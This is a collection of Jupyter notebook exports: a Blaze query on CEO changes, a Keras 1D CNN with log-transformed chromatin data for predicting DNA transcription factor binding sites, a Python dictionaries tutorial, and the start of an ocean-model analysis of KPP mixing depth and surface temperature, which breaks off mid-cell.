amd = ceo_change[ceo_change.sid==sid_amd][['timestamp','in_ceoname', 'out_ceoname','change_status']].sort('timestamp')
amd
```
Now suppose we want to know how many CEO changes there were in the past year in which a female CEO was incoming.
```
females_in = ceo_change[ceo_change['in_ceogender']=='Female']
# Note that whenever you print a Blaze Data Object here, it will be automatically truncated to ten rows.
females_in = females_in[females_in.asof_date > '2014-09-17']
len(females_in)
```
Finally, suppose want this as a DataFrame:
```
females_in_df = odo(females_in, pd.DataFrame)
females_in_df.sort('symbol', inplace=True)
# let's get the first three rows
females_in_df[:3]
```
| github_jupyter |
<a href="https://colab.research.google.com/github/charlesreid1/deep-learning-genomics/blob/master/keras_sklearn_cnn1d_dna_transcription_logx.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Keras and Sklearn for Deep Learning Genomics
## Variation 1: Log Transform
This notebook is a variation on a prior notebook, `keras_sklearn_cnn1d_dna_transcription.ipynb` ([Jupyter notebook](https://github.com/charlesreid1/deep-learning-genomics/blob/master/keras_cnn1d_dna_transcription.ipynb) or [Google CoLab notebook](https://colab.research.google.com/github/charlesreid1/deep-learning-genomics/blob/master/keras_cnn1d_dna_transcription.ipynb#)). It continues with the example from a prior notebook, namely, the problem of predicting transcription factor binding sites in DNA. This type of neural network operates on 1D sequence data (DNA nucleotides), so we build a 1D convolutional neural network to perform classification of DNA (is this string of nucleotides a transcription factor binding site or not).
This notebook variation is to transform chromatin data into log space using a log transform, followed by a standard scaling transform (this ensures the log-transformed data has mean of 0 and variance of 1). The transformed data is then fed to the neural network instead of the raw chromatin coverage data. The log transform parameters are determined from the training data set and applied to the testing data set.
This notebook duplicates large sections from the `keras_sklearn_cnn1d_dna_transcription.ipynb`, so visit that notebook for details and explanations.
## Import Libraries
```
import tensorflow as tf
tf.test.gpu_device_name()
import os
import math
import numpy as np
import numpy
import matplotlib.pyplot as plt
import seaborn as sns
import joblib
# sklearn
from sklearn.model_selection import StratifiedKFold, StratifiedShuffleSplit
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import FunctionTransformer
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.metrics import roc_curve, auc, roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn.utils import class_weight
from keras.models import Sequential, Model
from keras.layers import Flatten, Embedding, Dense, Dropout, Input, Concatenate
from keras.layers import Conv1D, GlobalAveragePooling1D, MaxPooling1D
import keras
seed = 1729
numpy.random.seed(seed)
```
## Define Useful Keras Metrics
```
# via https://github.com/keras-team/keras/issues/6507#issuecomment-322857357
import keras.backend as K
def precision(y_true, y_pred):
    """Batch-wise precision: true positives / predicted positives.

    clip() forces values into [0, 1] and round() binarizes them, so the
    elementwise product counts true positives. K.epsilon() guards
    against division by zero when nothing is predicted positive.
    """
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted_pos = K.sum(K.round(K.clip(y_pred, 0, 1)))
    return tp / (predicted_pos + K.epsilon())
def recall(y_true, y_pred):
    """Batch-wise recall: true positives / actual positives.

    clip() forces values into [0, 1] and round() binarizes them, so the
    elementwise product counts true positives. K.epsilon() guards
    against division by zero when there are no positive labels.
    """
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    actual_pos = K.sum(K.round(K.clip(y_true, 0, 1)))
    return tp / (actual_pos + K.epsilon())
def fvalue(y_true, y_pred):
    """Batch-wise F1 score, the harmonic mean of precision and recall.

    Mirrors sklearn's convention: when the batch contains no positive
    labels at all, the score is pinned to 0.
    """
    if K.sum(K.round(K.clip(y_true, 0, 1))) == 0:
        return 0
    p = precision(y_true, y_pred)
    r = recall(y_true, y_pred)
    return (2 * p * r) / (p + r + K.epsilon())
```
## Load Dataset
```
!git clone https://github.com/deepchem/DeepLearningLifeSciences.git
!ln -fs DeepLearningLifeSciences/Chapter06/{test*,train*,valid*} .
!ln -fs DeepLearningLifeSciences/Chapter06/chromatin.txt
def load_all_data():
    """Load and concatenate the train/valid/test shards plus chromatin data.

    Returns
    -------
    [X, chromatin], y, w, ids
        X are the one-hot sequences, chromatin the raw accessibility
        value looked up per sequence id, y the labels, w the sample
        weights, ids the sequence identifiers.

    The chromatin values are deliberately NOT transformed here; the
    log/scaling transform is fit on the training split only, after the
    train/test split, to avoid information leakage.
    """
    # sequence id -> chromatin accessibility coverage
    accessibility = {}
    with open('chromatin.txt', 'r') as fh:
        for line in fh:
            fields = line.split()
            accessibility[fields[0]] = float(fields[1])

    # collect each split's arrays, then concatenate once at the end
    # (equivalent to the pairwise concatenation of the original loop)
    xs, ys, ws, id_chunks, chrom_chunks = [], [], [], [], []
    for label in ('train', 'valid', 'test'):
        datadir = "%s_dataset" % (label)
        base_filename = "shard-0-%s.joblib"
        this_X = joblib.load(os.path.join(datadir, base_filename % ("X")))
        this_y = joblib.load(os.path.join(datadir, base_filename % ("y")))
        this_w = joblib.load(os.path.join(datadir, base_filename % ("w")))
        this_ids = joblib.load(os.path.join(datadir, base_filename % ("ids")))
        xs.append(this_X)
        ys.append(this_y)
        ws.append(this_w)
        id_chunks.append(this_ids)
        chrom_chunks.append(np.array([accessibility[k] for k in this_ids]))

    X = np.concatenate(xs)
    chromatin = np.concatenate(chrom_chunks)
    y = np.concatenate(ys)
    w = np.concatenate(ws)
    ids = np.concatenate(id_chunks)
    return [X, chromatin], y, w, ids
[X,chromatin], y, w, ids = load_all_data()
print("Shape of all data:\n")
print("X shape:")
print(np.shape(X))
print("chromatin shape:")
print(np.shape(chromatin))
print("y shape:")
print(np.shape(y))
print("w shape:")
print(np.shape(w))
print(np.min(chromatin))
print(np.max(chromatin))
print(np.mean(chromatin))
```
## Get Class Weights for Training
```
classes = np.unique(y)
labels = np.squeeze(y)
weights = class_weight.compute_class_weight('balanced',classes,labels)
class_weights = {}
for c,w in zip(classes,weights):
class_weights[c] = w
print(class_weights)
```
## Stratified K-Fold Validation
```
def create_chromatin():
    """Create and return a compiled two-branch 1D convolutional model.

    Branch 1 consumes one-hot DNA sequences (101 bases x 4-letter
    alphabet) through three Conv1D+Dropout stages and a Flatten; branch
    2 is the scalar chromatin-accessibility value. The branches are
    concatenated and fed to a single sigmoid unit for binary
    classification (binding site / not a binding site).
    """
    alphabet_size = 4       # one-hot DNA: A, C, G, T
    sequence_length = 101   # bases per example
    kernel_width = 10       # convolution window
    filter_count = 16       # filters per conv layer

    # --- sequence branch (1D DNA sequence) ---
    seq_input = Input(shape=(sequence_length, alphabet_size))
    x = seq_input
    # three identical convolution + dropout stages
    for _ in range(3):
        x = Conv1D(filter_count, kernel_width,
                   activation='relu',
                   padding='same',
                   kernel_initializer='normal')(x)
        x = Dropout(0.5)(x)
    x = Flatten()(x)
    seq_branch = keras.Model(inputs=seq_input, outputs=x)

    # --- chromatin branch (a single scalar per example) ---
    chrom_input = Input(shape=(1,))

    # --- merge the branches and classify ---
    merged = keras.layers.concatenate([seq_branch.output, chrom_input])
    out = Dense(1,
                kernel_initializer='normal',
                activation='sigmoid')(merged)
    chrom_model = keras.Model(inputs=[seq_branch.input, chrom_input],
                              outputs=out)

    chrom_model.compile(loss='binary_crossentropy',
                        optimizer='adam',
                        sample_weight_mode=None,
                        metrics=['accuracy',
                                 precision,
                                 recall,
                                 fvalue])
    return chrom_model
```
## Performing Cross Validation Manually (Transformed Data)
Next we perform cross-validation, incorporating class weights as in the example at the end of `keras_sklearn_cnn1d_dna_transcription.ipynb`.
We use a [StratifiedShuffleSplit](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.StratifiedShuffleSplit.html#sklearn.model_selection.StratifiedShuffleSplit) object again to create our test/train splits.
```
n_fold = 3
# we can use either of these,
# but we'll opt for shuffle
kfold = StratifiedKFold(n_splits=n_fold,
shuffle=True,
random_state=seed)
shuffle = StratifiedShuffleSplit(n_splits=n_fold,
train_size = 0.7,
test_size = 0.3,
random_state = seed)
```
### Visualizing the Log Transform
Let's first examine what the log transform will do to this data set:
```
fig, axes = plt.subplots(2,3,figsize=(14,6))
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = np.squeeze(chromatin[train_ix]), np.squeeze(chromatin[test_ix])
lab_test = 'Fold %d (Test)'%(ifold+1)
lab_train = 'Fold %d (Train)'%(ifold+1)
# Row 0 is the untransformed data:
sns.distplot(chrom_test, ax=axes[0,ifold],
label=lab_test,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "b"})
sns.distplot(chrom_train, ax=axes[0,ifold],
label=lab_train,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "r"})
########################################
# Perform log transform
logfunc = lambda x : np.log(x+1e-6)
logx = FunctionTransformer(logfunc, validate=True)
stdx = StandardScaler()
pipe = Pipeline([('logx',logx),('stdx',stdx)])
chromx_train = pipe.fit_transform(chrom_train.reshape(-1,1))
chromx_test = pipe.transform(chrom_test.reshape(-1,1))
########################################
# Row 1 is the transformed data:
sns.distplot(chromx_test, ax=axes[1,ifold],
label=lab_test,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "b"})
sns.distplot(chromx_train, ax=axes[1,ifold],
label=lab_train,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "r"})
axes[0,ifold].legend()
axes[1,ifold].legend()
axes[0,1].set_title('Distribution of Chromatin Coverage Values:\nUntransformed Data')
axes[1,1].set_title('Distribution of Chromatin Coverage Values:\nLog-Transformed Data')
plt.tight_layout()
plt.show()
n_epochs = 50
batch_size = 2048
include_chromatin_data = True
transformers = []
models = []
fithists = []
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = np.squeeze(chromatin[train_ix]), np.squeeze(chromatin[test_ix])
########################################
# Perform log transform
logfunc = lambda x : np.log(x+1e-6)
logx = FunctionTransformer(logfunc, validate=True)
stdx = StandardScaler()
pipe = Pipeline([('logx',logx),('stdx',stdx)])
chromx_train = pipe.fit_transform(chrom_train.reshape(-1,1))
chromx_test = pipe.transform(chrom_test.reshape(-1,1))
########################################
print("Training on fold %d..."%(ifold+1))
# if we use the chromatin model,
# we need to provide the network
# with a *list* of inputs
if include_chromatin_data:
model = create_chromatin()
hist = model.fit([X_train,chromx_train], y_train,
class_weight = class_weights,
batch_size = batch_size,
epochs = n_epochs,
verbose = 0,
validation_data=([X_test,chromx_test],y_test))
else:
model = create_baseline()
hist = model.fit(X_train, y_train,
class_weight = class_weights,
batch_size = batch_size,
epochs = n_epochs,
verbose = 0,
validation_data=(X_test,y_test))
transformers.append(pipe)
models.append(model)
fithists.append(hist)
print("Done")
print("Model results (validation):")
print("\n")
print("Loss (Mean): %0.4f"%(np.mean([h.history['val_loss'] for h in fithists])))
print("Loss (Std): %0.4f"%(np.std([h.history['val_loss'] for h in fithists])))
print("\n")
print("Accuracy (Mean): %0.2f%%"%(100*np.mean([h.history['val_acc'] for h in fithists])))
print("Accuracy (Std): %0.2f%%"%(100*np.std([h.history['val_acc'] for h in fithists])))
print("\n")
print("Precision (Mean): %0.2f%%"%(100*np.mean([h.history['val_precision'] for h in fithists])))
print("Precision (Std): %0.2f%%"%(100*np.std([h.history['val_precision'] for h in fithists])))
print("\n")
print("Recall (Mean): %0.2f%%"%(100*np.mean([h.history['val_recall'] for h in fithists])))
print("Recall (Std): %0.2f%%"%(100*np.std([h.history['val_recall'] for h in fithists])))
def loss_rate_plot(hist, ax, label='',legend=False):
    """Plot training and validation loss curves on the given axes.

    Parameters
    ----------
    hist : Keras History-like object exposing .history['loss'/'val_loss']
    ax : matplotlib Axes to draw on
    label : optional fold label appended to the title, e.g. "Fold 1"
    legend : if True, add a Training/Validation legend
    """
    ax.plot(hist.history['loss'])
    ax.plot(hist.history['val_loss'])
    if label=='':
        ax.set_title("Loss Rate", size=14)
    else:
        ax.set_title("Loss Rate (%s)"%(label), size=14)
    ax.set_ylabel('Loss')
    # Fixed typo (was "Training interations"), matching the sibling plots.
    ax.set_xlabel('Training iterations')
    if legend:
        ax.legend(['Training', 'Validation'], loc='upper right')
def accuracy_rate_plot(hist,ax,label='',legend=False):
    """Plot training and validation accuracy (in percent) on the given axes."""
    for key in ('acc', 'val_acc'):
        ax.plot([100 * v for v in hist.history[key]])
    title = "Accuracy" if label == '' else "Accuracy (%s)" % (label)
    ax.set_title(title, size=14)
    ax.set_ylabel('Accuracy %')
    ax.set_xlabel('Training iterations')
    if legend:
        ax.legend(['Training','Validation'], loc='lower right')
def precision_rate_plot(hist,ax,label='',legend=False):
    """Plot training and validation precision (in percent) on the given axes."""
    to_pct = lambda series: [value * 100 for value in series]
    ax.plot(to_pct(hist.history['precision']))
    ax.plot(to_pct(hist.history['val_precision']))
    suffix = "" if label == '' else " (%s)" % (label)
    ax.set_title("Precision" + suffix, size=14)
    ax.set_ylabel('Precision %')
    ax.set_xlabel('Training iterations')
    if legend:
        ax.legend(['Training','Validation'], loc='lower right')
def recall_rate_plot(hist,ax,label='',legend=False):
    """Plot training and validation recall (in percent) on the given axes."""
    train_pct = [100 * r for r in hist.history['recall']]
    valid_pct = [100 * r for r in hist.history['val_recall']]
    ax.plot(train_pct)
    ax.plot(valid_pct)
    ax.set_title("Recall" if label == '' else "Recall (%s)" % (label), size=14)
    ax.set_ylabel('Recall %')
    ax.set_xlabel('Training iterations')
    if legend:
        ax.legend(['Training','Validation'], loc='lower right')
# One 2x2 figure per fold: loss, accuracy, precision and recall curves.
for fold_idx in range(shuffle.get_n_splits()):
    fold_label = "Fold %d" % (fold_idx + 1)
    fig, axgrid = plt.subplots(2, 2, figsize=(8, 6))
    (ax_loss, ax_acc), (ax_prec, ax_rec) = axgrid
    loss_rate_plot(fithists[fold_idx], ax_loss, legend=True, label=fold_label)
    accuracy_rate_plot(fithists[fold_idx], ax_acc, label=fold_label)
    precision_rate_plot(fithists[fold_idx], ax_prec, label=fold_label)
    recall_rate_plot(fithists[fold_idx], ax_rec, label=fold_label)
    fig.tight_layout()
    plt.show()
def plot_confusion_matrix(y_true, y_pred, classes,
                          title=None,
                          cmap=plt.cm.Blues):
    """
    Print the confusion matrix for (y_true, y_pred) and render it as an
    annotated heatmap labelled with the given class names.
    Returns the matplotlib Axes.
    """
    if not title:
        title = 'Confusion matrix'
    # Compute and echo the raw counts before plotting.
    cm = confusion_matrix(y_true, y_pred)
    print('Confusion matrix:')
    print(cm)
    fig, ax = plt.subplots()
    image = ax.imshow(cm, interpolation='nearest', cmap=cmap)
    ax.figure.colorbar(image, ax=ax)
    n_rows, n_cols = cm.shape
    # Show every tick and label it with the corresponding class name.
    ax.set(xticks=np.arange(n_cols),
           yticks=np.arange(n_rows),
           xticklabels=classes, yticklabels=classes,
           title=title,
           ylabel='True label',
           xlabel='Predicted label')
    # Rotate the x tick labels for readability.
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")
    # Annotate each cell, switching the text color on dark cells.
    midpoint = cm.max() / 2.
    for row in range(n_rows):
        for col in range(n_cols):
            ax.text(col, row, format(cm[row, col], ','),
                    ha="center", va="center",
                    color="white" if cm[row, col] > midpoint else "black")
    fig.tight_layout()
    return ax
# Re-create each fold's test split, apply that fold's fitted chromatin
# pipeline, and plot a confusion matrix from the fold's trained model.
# NOTE(review): shuffle.split() must yield the same splits here as during
# training (fixed random_state) for transformers/models to line up.
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
    print("---------------")
    print("Confusion Matrix - Fold %d:"%(ifold+1))
    X_train, X_test = X[train_ix], X[test_ix]
    y_train, y_test = y[train_ix], y[test_ix]
    chrom_train, chrom_test = chromatin[train_ix], chromatin[test_ix]
    transformer = transformers[ifold]
    ##########################
    # apply power transformer (the log + standardize pipeline that was fit
    # on this fold's training data)
    chromx_train = transformer.transform(chrom_train.reshape(-1,1))
    chromx_test = transformer.transform(chrom_test.reshape(-1,1))
    ##########################
    model = models[ifold]
    if include_chromatin_data:
        y_test_pred = model.predict([X_test,chromx_test])
    else:
        y_test_pred = model.predict(X_test)
    # Round model outputs to hard 0/1 class labels before tabulating.
    y_test_pred = np.round(y_test_pred)
    ax = plot_confusion_matrix(y_test, y_test_pred, ['0','1'], title="Confusion Matrix - Fold %d"%(ifold+1))
```
Finally, we compute the ROC curve for all k models from the k-fold cross-validation and use those curves to assemble the mean and variance of the ROC curve at every point by assuming the samples come from a normal distribution (equivalent to assuming the error in the model is normally distributed). See [ROC with cross validation example](https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc_crossval.html) in the sklearn documentation.
```
def plot_roc_curve(y_true, y_pred, weights):
    """Plot a single ROC curve with its AUC in the legend.

    Parameters
    ----------
    y_true : true binary labels
    y_pred : predicted scores/probabilities
    weights : kept for interface compatibility; sample weighting is
        currently disabled (see the commented-out call below).

    Returns the matplotlib Axes.
    """
    fpr, tpr, _ = roc_curve(y_true, y_pred)#,
    #sample_weight = weights)
    fig, ax = plt.subplots()
    ax.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc_score(y_true, y_pred))
    ax.set_xlabel('False Positive Rate')
    ax.set_ylabel('True Positive Rate')
    ax.plot([0,1],[0,1],'k--')
    ax.set_title("ROC Curve")
    plt.legend(loc='lower right')
    # BUGFIX: lay out before showing — tight_layout() after plt.show()
    # has no effect on the already-rendered figure.
    fig.tight_layout()
    plt.show()
    return ax
# https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc_crossval.html
# Mean +/- std ROC across the k folds: each fold's TPR is interpolated onto
# a common FPR grid so the curves can be averaged pointwise.
fig, ax = plt.subplots(1,1,figsize=(8,8))
tprs = []
aucs = []
mean_fpr = np.linspace(0,1,100)
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
    print("Working on fold %d..."%(ifold+1))
    X_train, X_test = X[train_ix], X[test_ix]
    y_train, y_test = y[train_ix], y[test_ix]
    chrom_train, chrom_test = chromatin[train_ix], chromatin[test_ix]
    # BUGFIX: apply the fold's fitted chromatin pipeline before predicting,
    # matching how the model was trained (raw values were passed before).
    chromx_test = transformers[ifold].transform(chrom_test.reshape(-1,1))
    model = models[ifold]
    if include_chromatin_data:
        y_test_pred = model.predict([X_test,chromx_test]).ravel()
    else:
        y_test_pred = model.predict(X_test).ravel()
    fpr, tpr, thresholds = roc_curve(y_test, y_test_pred)
    # np.interp replaces the deprecated/removed `from scipy import interp`.
    tprs.append(np.interp(mean_fpr, fpr, tpr))
    tprs[-1][0] = 0.0
    roc_auc = auc(fpr,tpr)
    aucs.append(roc_auc)
    ax.plot(fpr,tpr, alpha=0.3)
mean_tpr = np.mean(tprs,axis=0)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
std_auc = np.std(aucs)
ax.plot(mean_fpr, mean_tpr, color='b', alpha=0.8)
# One-sigma band around the mean curve, clipped to [0, 1].
std_tpr = np.std(tprs, axis=0)
tprs_upper = np.minimum(mean_tpr + std_tpr, 1)
tprs_lower = np.maximum(mean_tpr - std_tpr, 0)
ax.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=0.2)
ax.plot([0,1],[0,1],'--k',lw=2)
ax.set_title('ROC Curve, 1D CNN With Chromatin')
print("Area under curve:")
print("Mean: %0.4f"%(mean_auc))
print("Std: %0.4f"%(std_auc))
plt.show()
```
| github_jupyter |
# Dictionaries
We've been learning about *sequences* in Python but now we're going to switch gears and learn about *mappings* in Python. If you're familiar with other languages you can think of these Dictionaries as hash tables.
This section will serve as a brief introduction to dictionaries and consist of:
1.) Constructing a Dictionary
2.) Accessing objects from a dictionary
3.) Nesting Dictionaries
4.) Basic Dictionary Methods
So what are mappings? Mappings are collections of objects that are stored by a *key*, unlike a sequence, which stores objects by their relative position. This is an important distinction: since mappings store objects by key, they are not kept in any particular order.
A Python dictionary consists of a key and then an associated value. That value can be almost any Python object.
## Constructing a Dictionary
Let's see how we can construct dictionaries to get a better understanding of how they work!
```
# Make a dictionary with {} and : to separate each key from its value
my_dict = {'key1':'value1','key2':'value2'}
# Look up a value by its key
my_dict['key2']
```
Its important to note that dictionaries are very flexible in the data types they can hold. For example:
```
# Values can be any type: an int, a list of ints, a list of strings...
my_dict = {'key1':123,'key2':[12,23,33],'key3':['item0','item1','item2']}
# Let's call items from the dictionary
my_dict['key3']
# We can index into the list stored at that key
my_dict['key3'][0]
# ...and even call methods on the retrieved element
my_dict['key3'][0].upper()
```
We can also change the value stored at a key. For instance:
```
# Current value stored under 'key1'
my_dict['key1']
# Subtract 123 from the stored value
my_dict['key1'] = my_dict['key1'] - 123
# Check the updated value
my_dict['key1']
```
A quick note, Python has a built-in method of doing a self subtraction or addition (or multiplication or division). We could have also used += or -= for the above statement. For example:
```
# Augmented assignment: set the object equal to itself minus 123
my_dict['key1'] -= 123
my_dict['key1']
```
We can also create keys by assignment. For instance if we started off with an empty dictionary, we could continually add to it:
```
# Create a new empty dictionary
d = {}
# Create a new key through assignment
d['animal'] = 'Dog'
# Can do this with any object as the value
d['answer'] = 42
# Show the dictionary
d
```
## Nesting with Dictionaries
Hopefully you're starting to see how powerful Python is with its flexibility of nesting objects and calling methods on them. Let's see a dictionary nested inside a dictionary:
```
# A dictionary nested inside a dictionary nested inside a dictionary
d = {'key1':{'nestkey':{'subnestkey':'value'}}}
```
Wow! That's quite the inception of dictionaries! Let's see how we can grab that value:
```
# Keep chaining the keys to reach the innermost value
d['key1']['nestkey']['subnestkey']
```
## A few Dictionary Methods
There are a few methods we can call on a dictionary. Let's get a quick introduction to a few of them:
```
# Create a typical dictionary
d = {'key1':1,'key2':2,'key3':3}
# Method returning a view of all keys
d.keys()
# Method returning a view of all values
d.values()
# Method returning a view of (key, value) tuples (we'll learn about tuples soon)
d.items()
```
Hopefully you now have a good basic understanding of how to construct dictionaries. There's a lot more to go into here, but we will revisit dictionaries at a later time. After this section, all you need to know is how to create a dictionary and how to retrieve values from it.
| github_jupyter |
```
import cartopy.crs as ccrs
import cosima_cookbook as cc
import cartopy.feature as cfeature
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import cmocean as cm
from dask.distributed import Client
import matplotlib.path as mpath
import matplotlib.pyplot as plt
import numpy as np
import xarray as xr
# Avoid the Runtime errors in true_divide encountered when trying to divide by zero
import warnings
warnings.filterwarnings('ignore', category = RuntimeWarning)
warnings.filterwarnings('ignore', category = ResourceWarning)
warnings.filterwarnings('ignore', category = BytesWarning)
# matplotlib stuff: inline rendering, STIX fonts, thicker default lines
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib
from mpl_toolkits.mplot3d import axes3d
%matplotlib inline
matplotlib.rcParams['mathtext.fontset'] = 'stix'
matplotlib.rcParams['font.family'] = 'STIXGeneral'
matplotlib.rcParams['lines.linewidth'] = 2.0
# Suppress chatty "distributed.utils_perf" log messages below ERROR
import logging
logger = logging.getLogger("distributed.utils_perf")
logger.setLevel(logging.ERROR)
# Start a local dask cluster; evaluating `client` displays its summary
from dask.distributed import Client
client = Client()
client
# One cosima-cookbook database session per experiment archive.
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_nostress.db'
session_cont = cc.database.create_session(db)
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_vary_rlds.db'
session_vary_rlds = cc.database.create_session(db)
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_vary_rlds20_SAT3.75.db'
session_vary_rlds_SAT = cc.database.create_session(db)
# Experiments, their sessions and display labels are paired index-for-index.
expt = ['1deg_jra55_ryf_param_KPP', '1deg_jra55_ryf_nostress', '1deg_jra55_ryf_vary_rlds', '1deg_jra55_ryf_vary_rlds20_SAT3.75']
session = [session_cont, session_cont, session_vary_rlds, session_vary_rlds_SAT]
name = ['Control', 'Nostress', 'Vary rlds only', 'Vary rlds and SAT']
# Analysis time window used by most cells below.
start_time = '1900-01-01'
end_time = '1900-12-31'
start_time_last = '1900-01-01'
end_time_last = end_time
# Number of monthly samples averaged together when coarsening timeseries.
ncoarse = 12
# Basin bounding boxes (lon min/max, lat min/max), one column per basin.
# Labels presumably mean North Atlantic / North Pacific / two Southern
# Ocean sectors — TODO confirm against the grid's longitude convention.
x_min = [-100, -250, -70, -250]
x_max = [ 10 , -100, 20, -80 ]
y_min = [ 20 , 20 , -80, -80 ]
y_max = [ 75 , 75 , -55, -55 ]
basin = ['NA', 'NP', 'SA', 'SP']
```
## KPP Depth
```
# KPP boundary-layer depth (hblt): area-weighted basin-mean timeseries for
# each experiment, then time-mean maps and fractional-difference maps.
# NOTE(review): this initial load is immediately overwritten in the loop.
hblt = cc.querying.getvar(expt = expt[3], session = session_vary_rlds_SAT, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
    hblt = cc.querying.getvar(expt = expt[i], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    # Finite mask keeps land/missing points out of the area weighting.
    finite_variable = xr.ufuncs.isfinite(hblt)
    for k, l in enumerate(basin):
        area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
        area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
        area_t_basin = (finite_variable * area_t).mean('time')
        hblt_basin = (hblt*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
        #hblt_basin = hblt_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
        hblt_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
        del area_t
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title('KPP mixing layer - ' + basin[k])
# Time-mean hblt maps per experiment (rows 0-1) and fractional-difference
# maps against the control run (row 2).
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (20, 18))
start_time_hblt = start_time_last
end_time_hblt = end_time
for i, j in enumerate(session):
    hblt = cc.querying.getvar(expt = expt[i], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    hblt.sel(time = slice(start_time_hblt, end_time_hblt)).mean('time').plot(ax = axes[int(i/2)][int(i%2)], vmin = 0, vmax = 100)
    axes[int(i/2)][int(i%2)].set_title('KPP mixing layer - ' + name[i])
for i, j in enumerate([session_cont, session_vary_rlds]):
    hblt_cont = cc.querying.getvar(expt = expt[0], session = session_cont, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    hblt = cc.querying.getvar(expt = expt[2*i + 1], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    ((hblt_cont - hblt)/(hblt_cont)).sel(time = slice(start_time_hblt, end_time_hblt)).mean('time').plot(ax = axes[2][i], vmin = -1, vmax = 1, cmap = 'RdBu_r')
# BUGFIX: the difference panels are drawn in row 2; the titles were
# previously set on axes[1][*], clobbering the row-1 experiment titles
# (compare the analogous net-surface-heating cell, which uses axes[2][*]).
axes[2][0].set_title('KPP mixing layer fractional difference - control vs nostress')
axes[2][1].set_title('KPP mixing layer fractional difference - control vs vary-rlds')
```
## Surface temperature
```
# Near-surface temperature: area-weighted basin-mean timeseries (top) and
# time-mean contour maps (bottom) for each experiment.
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
    temp_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'temp', frequency = '1 monthly').sel(time = slice(start_time, end_time))
    # NOTE(review): isel(st_ocean = 1) picks the *second* vertical level,
    # not the topmost (index 0) — confirm this is intended for "surface".
    temp_sfc = temp_sfc.isel(st_ocean = 1)
    # Finite mask keeps land/missing points out of the area weighting.
    finite_variable = xr.ufuncs.isfinite(temp_sfc)
    for k, l in enumerate(basin):
        area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
        area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
        area_t_basin = (finite_variable * area_t).mean('time')
        temp_sfc_basin = (temp_sfc*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
        # Coarsen the monthly series into ncoarse-month means.
        temp_sfc_basin = temp_sfc_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
        temp_sfc_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
        del area_t
        axes[int(k/2)][int(k%2)].legend()
        axes[int(k/2)][int(k%2)].set_title('Surface temperature - ' + basin[k])
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
    temp_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'temp', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
    # Convert from Kelvin to degrees Celsius for the maps.
    temp_sfc = temp_sfc.isel(st_ocean = 1) - 273.15
    # NOTE(review): finite_variable is computed here but not used below.
    finite_variable = xr.ufuncs.isfinite(temp_sfc)
    temp_sfc.mean('time').plot.contourf(ax = axes[int(i/2)][int(i%2)], levels = np.linspace(-30, 30, 21))
```
## Surface salinity
```
# Near-surface salinity: area-weighted basin-mean timeseries per experiment.
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
